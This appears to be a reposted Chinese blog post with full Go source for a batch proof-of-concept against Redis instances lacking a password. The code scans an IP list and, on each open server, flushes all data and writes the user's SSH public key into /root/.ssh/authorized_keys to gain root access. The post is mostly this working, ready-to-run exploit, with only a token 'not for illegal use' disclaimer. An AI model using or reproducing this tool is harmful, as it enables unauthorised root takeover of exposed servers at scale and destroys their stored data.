redis批量弱口令扫描及get root的poc[go语言版]

mb5fcdf35dba419 · · 534 次点击 · · 开始浏览    
这是一个创建于 的文章,其中的信息可能已经有所发展或是发生改变。

redis批量弱口令扫描及get root的poc[go语言版]

前些时间通过redis的弱口令拿服务器root权限的漏洞火了,一直没时间关注,今天下午难得有时间就出个批量利用的poc,效果见题图。

请勿用于非法用途,just for fun。

依赖包安装:

go get gopkg.in/redis.v3

const rsa_key常量为你的cat ~/.ssh/id_rsa.pub的内容,生成方式如下:


0746103054d42c97fe6c35fc096b0110.jpeg完整代码:


package mainimport (
	"bufio"
	"bytes"
	"fmt"
	"gopkg.in/redis.v3"
	"log"
	"os"
	"runtime"
	"strings"
	"time")const rsa_key = "\n\ncat ~/.ssh/id_rsa.pub的内容,自己用ssh-keygen -t rsa生成下即可\n\n"// HostInfo structtype HostInfo struct {
	host   string
	port   string
	reply  string
	is_vul bool}// help functionfunc Usage(cmd string) {
	fmt.Println(strings.Repeat("-", 50))
	fmt.Println("Redis weak password poc by netxfly<x@xsec.io>")
	fmt.Println("Usage:")
	fmt.Printf("%s iplist \n", cmd)
	fmt.Println(strings.Repeat("-", 50))}// main functionfunc main() {
	runtime.GOMAXPROCS(runtime.NumCPU())

	if len(os.Args) != 2 {
		Usage(os.Args[0])
	} else {
		Usage(os.Args[0])
		iplist := os.Args[1]
		Scan(Prepare(iplist))
	}}// read line from file and Scanfunc Prepare(iplist string) (slice_iplist []string) {
	iplistFile, _ := os.Open(iplist)
	defer iplistFile.Close()
	scanner := bufio.NewScanner(iplistFile)
	scanner.Split(bufio.ScanLines)
	for scanner.Scan() {
		slice_iplist = append(slice_iplist, scanner.Text())
	}

	return slice_iplist}//Test connect functionfunc TestConnect(host_info HostInfo, chan_result chan HostInfo) {
	host := host_info.host
	port := host_info.port
	reply := host_info.reply
	is_vul := false

	var buf bytes.Buffer
	logger := log.New(&buf, "logger: ", log.Ldate)

	client := redis.NewClient(&redis.Options{
		Addr:     host + ":" + port,
		Password: "", // no password set		DB:       0,  // use default DB	})

	_, err := client.Ping().Result()
	if err == nil {
		is_vul = true

		logger.Println(client.ConfigSet("dbfilename", "xsec.rdb").String())
		logger.Println(client.Save().String())
		logger.Println(client.FlushAll().String())

		client.Set("xsec", rsa_key, 0)
		logger.Println(client.ConfigSet("dir", "/root/.ssh/").String())
		logger.Println(client.ConfigGet("dir").String())
		reply = client.ConfigSet("dbfilename", "authorized_keys").String()
		logger.Println(reply)
		logger.Println(client.Save().String())
		fmt.Println(&buf)
	}

	host_info.is_vul = is_vul
	host_info.reply = reply
	chan_result <- host_info}// Scan functionfunc Scan(slice_iplist []string) {
	n := len(slice_iplist)
	chan_scan_result := make(chan HostInfo, n)
	done := make(chan bool, n)

	for _, host_port := range slice_iplist {
		// fmt.Printf("Try to connect %s\n", host_port)		t := strings.Split(host_port, ":")
		host := t[0]
		port := t[1]
		host_info := HostInfo{host, port, "", false}

		go TestConnect(host_info, chan_scan_result)
		for runtime.NumGoroutine() > runtime.NumCPU()*200 {
			time.Sleep(10 * time.Microsecond)
		}

	}

	go func() {
		for i := 0; i < cap(chan_scan_result); i++ {
			select {
			case r := <-chan_scan_result:
				if r.is_vul {
					fmt.Printf("%s:%s is vulnerability, get root's reply: %s\n", r.host, r.port, r.reply)
				}
			case <-time.After(60 * time.Second):
				fmt.Println("timeout")
				break

			}
			done <- true

		}
	}()

	for i := 0; i < cap(done); i++ {
		<-done
	}}



有疑问加站长微信联系(非本文作者)

本文来自:51CTO博客

感谢作者:mb5fcdf35dba419

查看原文:redis批量弱口令扫描及get root的poc[go语言版]

入群交流(和以上内容无关):加入Go大咖交流群,或添加微信:liuxiaoyan-s 备注:入群;或加QQ群:692541889

534 次点击  
加入收藏 微博
1 回复  |  直到 2021-02-06 22:46:00
暂无回复
添加一条新回复 (您需要 登录 后才能回复 没有账号 ?)
  • 请尽量让自己的回复能够对别人有帮助
  • 支持 Markdown 格式, **粗体**、~~删除线~~、`单行代码`
  • 支持 @ 本站用户;支持表情(输入 : 提示),见 Emoji cheat sheet
  • 图片支持拖拽、截图粘贴等方式上传